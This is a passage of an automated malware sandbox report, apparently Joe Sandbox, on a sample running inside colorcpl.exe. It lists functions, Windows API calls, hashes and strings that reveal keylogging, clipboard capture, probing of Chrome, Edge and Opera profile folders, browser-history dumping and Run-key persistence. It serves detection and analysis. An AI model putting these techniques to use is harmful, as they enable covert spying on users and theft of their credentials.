                                                          • Opcode Fuzzy Hash: f2fbe3181a9c411838e30296e166797c8b4dd5e435d8a4633b86fc4e2e0858fc
                                                          • Instruction Fuzzy Hash: FD01A7B2B092197EEB2139786CC0F67B64FDF417FCB290765F321651C0DB618C404A61
                                                          Function 02FD3B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a44627445dfa42a32885d9676af2e6fb15ab6950c8a543e6103c27763034fcfd
                                                          • Instruction ID: 192759680bde0bc433a17cf6a507aebced222c4fdc0b4c69995b754db832fb56
                                                          • Opcode Fuzzy Hash: a44627445dfa42a32885d9676af2e6fb15ab6950c8a543e6103c27763034fcfd
                                                          • Instruction Fuzzy Hash: 3101A2B2A092167EAB2129796CC0D27B64FEF413F932D07A6F721951D4DF608C044A62
                                                          Function 02FD85E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,02FD858D,00000000,00000000,00000000,00000000,?,02FD88B9,00000006,FlsSetValue), ref: 02FD8618
                                                          • GetLastError.KERNEL32(?,02FD858D,00000000,00000000,00000000,00000000,?,02FD88B9,00000006,FlsSetValue,02FEF170,02FEF178,00000000,00000364,?,02FD8367), ref: 02FD8624
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02FD858D,00000000,00000000,00000000,00000000,?,02FD88B9,00000006,FlsSetValue,02FEF170,02FEF178,00000000), ref: 02FD8632
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: ab2a43bcd0ade568fd203fd4cb508baf2495bf4ff6ede3d794c65372bd5105d5
                                                          • Instruction ID: 63ccb72ae9fb6de0d805551fadd4619a31ddc114b489b0bb183af165b9ee792d
                                                          • Opcode Fuzzy Hash: ab2a43bcd0ade568fd203fd4cb508baf2495bf4ff6ede3d794c65372bd5105d5
                                                          • Instruction Fuzzy Hash: 5401F73AB46226EBCF229A78DC44A57B759AF04BF1B190924FB06D7140D720DC12CEF4
                                                          Function 02FAC516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02F9A87E), ref: 02FAC52F
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 02FAC543
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02FAC568
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FAC576
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          • Opcode ID: 338b14e7afacd9c851ff0bd5de6249bc9a5ce03b85c34e7a3717ba9d3ccc829c
                                                          • Instruction ID: 78bcd4b626b8c4024a30f253441320819b98c0f9f1aca553d212a6e09d3c9752
                                                          • Opcode Fuzzy Hash: 338b14e7afacd9c851ff0bd5de6249bc9a5ce03b85c34e7a3717ba9d3ccc829c
                                                          • Instruction Fuzzy Hash: 2BF0C2B1A4120CBFEB111A25AD94FBB76ADDB876E4F000A2AFA01A2280DA614D054531
                                                          Function 02FAC26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02FAC286
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02FAC299
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02FAC2C4
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02FAC2CC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcess
                                                          • String ID:
                                                          • API String ID: 39102293-0
                                                          • Opcode ID: f6c5fa4af5a1f0fd7914cce2d575fc7cd4ea2481121967153c56ffeead18ef12
                                                          • Instruction ID: d57d739f6c15ddfb8d38b0d818960412543f663312f2c152ff0f75625c6fa409
                                                          • Opcode Fuzzy Hash: f6c5fa4af5a1f0fd7914cce2d575fc7cd4ea2481121967153c56ffeead18ef12
                                                          • Instruction Fuzzy Hash: 280149B2640219AFEB1266E49C49F77B6BCCB80FC1F000127FB04D3181EFA08D414A71
                                                          Function 02FC98E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 02FC98FA
                                                            • Part of subcall function 02FC9F32: ___AdjustPointer.LIBCMT ref: 02FC9F7C
                                                          • _UnwindNestedFrames.LIBCMT ref: 02FC9911
                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 02FC9923
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 02FC9947
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                          • String ID:
                                                          • API String ID: 2633735394-0
                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction ID: 1277287399e87b78c37bdcf551561318c1152f0f9bcc4004f43bc1acc5fd7a8f
                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction Fuzzy Hash: 06010C3240014ABBCF125F55CE00EEA3BBAFF89794F258118FA5865120C3B6E571DFA0
                                                          Function 02FA941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000004C), ref: 02FA942B
                                                          • GetSystemMetrics.USER32(0000004D), ref: 02FA9431
                                                          • GetSystemMetrics.USER32(0000004E), ref: 02FA9437
                                                          • GetSystemMetrics.USER32(0000004F), ref: 02FA943D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 27d1ea399e0f1e7458d00e0effe522ffba7cb86061e46663a9038dc8a9624ea2
                                                          • Instruction ID: 14df62d992b9e0867a8ff061b4e98a4b215dd0acd2147275188d1c8824f97baf
                                                          • Opcode Fuzzy Hash: 27d1ea399e0f1e7458d00e0effe522ffba7cb86061e46663a9038dc8a9624ea2
                                                          • Instruction Fuzzy Hash: EFF044E2B043155BD701EE758C64A2B7AD69BC42E0F10887EEB198B381EEE4DC058B91
                                                          Function 02F9404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02F94066
                                                            • Part of subcall function 02FABA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02FF6478,02F9D248,.vbs,?,?,?,?,?,030052F0), ref: 02FABA30
                                                            • Part of subcall function 02FA85A3: CloseHandle.KERNEL32(02F940F5,?,?,02F940F5,02FF5E84), ref: 02FA85B9
                                                            • Part of subcall function 02FA85A3: CloseHandle.KERNEL32(02FF5E84,?,?,02F940F5,02FF5E84), ref: 02FA85C2
                                                            • Part of subcall function 02FAC516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02F9A87E), ref: 02FAC52F
                                                          • Sleep.KERNEL32(000000FA,02FF5E84), ref: 02F94138
                                                          Strings
                                                          • /sort "Visit Time" /stext ", xrefs: 02F940B2
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "
                                                          • API String ID: 368326130-1573945896
                                                          • Opcode ID: 200a8ba8a4eb8c7ef3be7e00c1e4e36a8ef452e72bc59bc22c23c828fa0918bb
                                                          • Instruction ID: befa51ca3758cb141b329aae5b1562a9162da28f000c0b37999b8ab8a7d3e451
                                                          • Opcode Fuzzy Hash: 200a8ba8a4eb8c7ef3be7e00c1e4e36a8ef452e72bc59bc22c23c828fa0918bb
                                                          • Instruction Fuzzy Hash: B7314F31A1011D5AEF15FAB5DC94AEEB377AF90384F400069E70AA7190FF205E4ACE90
                                                          Function 02F9B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FC4801: __onexit.LIBCMT ref: 02FC4807
                                                          • __Init_thread_footer.LIBCMT ref: 02F9B7D2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                          • API String ID: 1881088180-3686566968
                                                          • Opcode ID: b0af32f9ac0f514032cc416562407846717dab3c395e3ea0da77704c8b45c2b2
                                                          • Instruction ID: 15c494a21fb25708afcbbcaef5da44aa2866636ebe12c560326c2f801a8293d1
                                                          • Opcode Fuzzy Hash: b0af32f9ac0f514032cc416562407846717dab3c395e3ea0da77704c8b45c2b2
                                                          • Instruction Fuzzy Hash: 29212D3191020D9AEF14FBA4EC90EEEB37AAF54794F50012AD71A67190EF21694ACE90
                                                          Function 02FE1BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,02FE1E12,?,00000050,?,?,?,?,?), ref: 02FE1C92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: 777b7683598938f172113edba7699c55a557f61a2208713a002dc7e65eef7635
                                                          • Instruction ID: 00fba24fed562497fdfd6da9e543ed6a2451122da43c895c5d5a7e62528ca5f4
                                                          • Opcode Fuzzy Hash: 777b7683598938f172113edba7699c55a557f61a2208713a002dc7e65eef7635
                                                          • Instruction Fuzzy Hash: 7B2190A2E00208A6DF368A5ECD41BEB72A6AB54FD5F568464EB0FD7204E732DD41D350
                                                          Function 02FAB580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 365919d6f7223bbb45bb5b4c0135af45285c19c67b4474f2e033c53a12f09631
                                                          • Instruction ID: 9385f16946c77cf4f4596218c6630623711607e5c6d3a60df55853f86b591c80
                                                          • Opcode Fuzzy Hash: 365919d6f7223bbb45bb5b4c0135af45285c19c67b4474f2e033c53a12f09631
                                                          • Instruction Fuzzy Hash: FD1193714082095AEB04FB65DC509FFB3E9AF44384F50092EF699C21D0EF34DA48CB92
                                                          Function 02F9B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02F9B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02F9B1AD
                                                            • Part of subcall function 02F9B19F: wsprintfW.USER32 ref: 02F9B22E
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          • CloseHandle.KERNEL32(?), ref: 02F9B0EF
                                                          • UnhookWindowsHookEx.USER32 ref: 02F9B102
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: 98305c69b96ca1e9c52fee2b6d936586c72e9c9e6a8359616cd0897c82375e13
                                                          • Instruction ID: ca5d4f1c91a46452ef7233452d105bc48c7602a6149ef27d4e80f7e255a3db99
                                                          • Opcode Fuzzy Hash: 98305c69b96ca1e9c52fee2b6d936586c72e9c9e6a8359616cd0897c82375e13
                                                          • Instruction Fuzzy Hash: BC01B135A00204ABFF21BB38DC0A7BEBBB69B41788F40045DDB4207595EB612896CFD2
                                                          Function 02F9C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02F9C531
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                          • API String ID: 1174141254-4188645398
                                                          • Opcode ID: 04cdf0c9a897886d1b121810dfe62f77711fdc8915edfcfe1aa8779ea3c13eac
                                                          • Instruction ID: a60677dba90ac62480591e9d6c355360827ad8b38b99204f6cc8ddbe40d849bf
                                                          • Opcode Fuzzy Hash: 04cdf0c9a897886d1b121810dfe62f77711fdc8915edfcfe1aa8779ea3c13eac
                                                          • Instruction Fuzzy Hash: F4F08231A0021A97FE04B7B4DC068FF7B2D9D206D1B40012AE706A2291EF50D846CEE0
                                                          Function 02F9C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 02F9C5F7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                          • API String ID: 1174141254-1629609700
                                                          • Opcode ID: f20529ec6c1b61356cc1bbd00fd1f25209950c31450e7fb9622746ca511ee473
                                                          • Instruction ID: 4a3a20df3f10efbb1926a98772fca3952194db10bb29f00c4dcf60a7924f7dd2
                                                          • Opcode Fuzzy Hash: f20529ec6c1b61356cc1bbd00fd1f25209950c31450e7fb9622746ca511ee473
                                                          • Instruction Fuzzy Hash: 68F08231A4021997BE15FBB5DC468FF7B2D9D20AD1F000166E70AA2191EF509841CFE0
                                                          Function 02F9C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02F9C594
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                          • API String ID: 1174141254-2800177040
                                                          • Opcode ID: cf40980a0b3df3a71f542f8066dd7ef94084368c680a8a969e88c867a0d384de
                                                          • Instruction ID: 13398c722025bfffa1d9f5f16c899d510b4c0d61e8aac72c24125a0e8ae5d001
                                                          • Opcode Fuzzy Hash: cf40980a0b3df3a71f542f8066dd7ef94084368c680a8a969e88c867a0d384de
                                                          • Instruction Fuzzy Hash: 2CF08231A0021A96FE04B6B5DC068FFBB2D9D106D5B400126A706A3190EF509846CEE0
                                                          Function 02F9B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 02F9B686
                                                            • Part of subcall function 02F9A41B: GetForegroundWindow.USER32(?,?,030050F0), ref: 02F9A451
                                                            • Part of subcall function 02F9A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 02F9A45D
                                                            • Part of subcall function 02F9A41B: GetKeyboardLayout.USER32(00000000), ref: 02F9A464
                                                            • Part of subcall function 02F9A41B: GetKeyState.USER32(00000010), ref: 02F9A46E
                                                            • Part of subcall function 02F9A41B: GetKeyboardState.USER32(?,?,030050F0), ref: 02F9A479
                                                            • Part of subcall function 02F9A41B: ToUnicodeEx.USER32(03005144,?,?,?,00000010,00000000,00000000), ref: 02F9A49C
                                                            • Part of subcall function 02F9A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02F9A4FC
                                                            • Part of subcall function 02F9A671: SetEvent.KERNEL32(?,?,00000000,02F9B245,00000000), ref: 02F9A69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: a6f618f72f6957f08f1a0d743af187328588b77748698ada469278e4e947850f
                                                          • Instruction ID: 2fec663617cd021a637a0471046d7f14dc6ba8db35fab703daa6cbfe704395d2
                                                          • Opcode Fuzzy Hash: a6f618f72f6957f08f1a0d743af187328588b77748698ada469278e4e947850f
                                                          • Instruction Fuzzy Hash: 9AE09B31B0022017FC69763CBD3E6BD3E168F82AE4B41018DEB43CB6A4DD9559514FD6
                                                          Function 02F9B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 02F9B6E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: 6f26d617b8653c2ac688b5ccdc78d4cc4dd04efebd3ffa79b8fe67134f902a2e
                                                          • Instruction ID: 83468d66d920ef5ccc315612e0e5463ef7932fac2978f288d82dba50b8efc15b
                                                          • Opcode Fuzzy Hash: 6f26d617b8653c2ac688b5ccdc78d4cc4dd04efebd3ffa79b8fe67134f902a2e
                                                          • Instruction Fuzzy Hash: 36E08631B0021457FD78797DEA1A77D3A25CB42BE8F400619EB838B699DE87891057E3
                                                          Function 02FA3A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,02F9D17F,00000000,030052D8,030052F0,?,pth_unenc), ref: 02FA3A6C
                                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 02FA3A80
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02FA3A6A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: a5cb0ff5fee356bc6b6db1bc5db4661b7364718aa0d5e51303958ef97b13afab
                                                          • Instruction ID: 2e76c760c51e7d57640384f82791e8b8d414e03a07d63d4cc3e0f36553801dd0
                                                          • Opcode Fuzzy Hash: a5cb0ff5fee356bc6b6db1bc5db4661b7364718aa0d5e51303958ef97b13afab
                                                          • Instruction Fuzzy Hash: 7CE0C272A8420CFBDF115E71DD06FBABB2CDB01F80F000698BB0696181C7629A149770
                                                          Function 02F9B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 02F9B8B1
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 02F9B8DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteDirectoryFileRemove
                                                          • String ID: pth_unenc
                                                          • API String ID: 3325800564-4028850238
                                                          • Opcode ID: 8e363902df7a12d78ebe37b1fe729fc3f3903dbe7afa2891eaca930d9c1cf509
                                                          • Instruction ID: 3be14406d719a26bebb5d68c3d6a0933089d51c72b7a30f14afa74c560db6747
                                                          • Opcode Fuzzy Hash: 8e363902df7a12d78ebe37b1fe729fc3f3903dbe7afa2891eaca930d9c1cf509
                                                          • Instruction Fuzzy Hash: F0E0C2718516288BEF22FB30DC94BEB739DAF04299F00092AD5A3D3120DF61984ADF60
                                                          Function 02FA288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,02F9F903), ref: 02FA289B
                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 02FA28AE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ObjectProcessSingleTerminateWait
                                                          • String ID: pth_unenc
                                                          • API String ID: 1872346434-4028850238
                                                          • Opcode ID: 48925a2ffacb3ef807257aa55ddeb36dcceca10e0df478d74bdcf993b6bc264a
                                                          • Instruction ID: 240077f2977db8c5dd692d4fbc568b4e7d775179f155fd890f58d5812c4ed4f1
                                                          • Opcode Fuzzy Hash: 48925a2ffacb3ef807257aa55ddeb36dcceca10e0df478d74bdcf993b6bc264a
                                                          • Instruction Fuzzy Hash: C6D0C93458A216ABDF222B60AD4CB447A5C9705269F100A02B431552E4C7694864AB21
                                                          Function 02FA1B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 02FA1BC7
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 02FA1C93
                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02FA1CB5
                                                          • SetLastError.KERNEL32(0000007E,02FA1F2B), ref: 02FA1CCC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastRead
                                                          • String ID:
                                                          • API String ID: 4100373531-0
                                                          • Opcode ID: d898a1fe6d8244430d526caa5a6a0d12b7ab91cd18e0f2629e8750ee9d6567f0
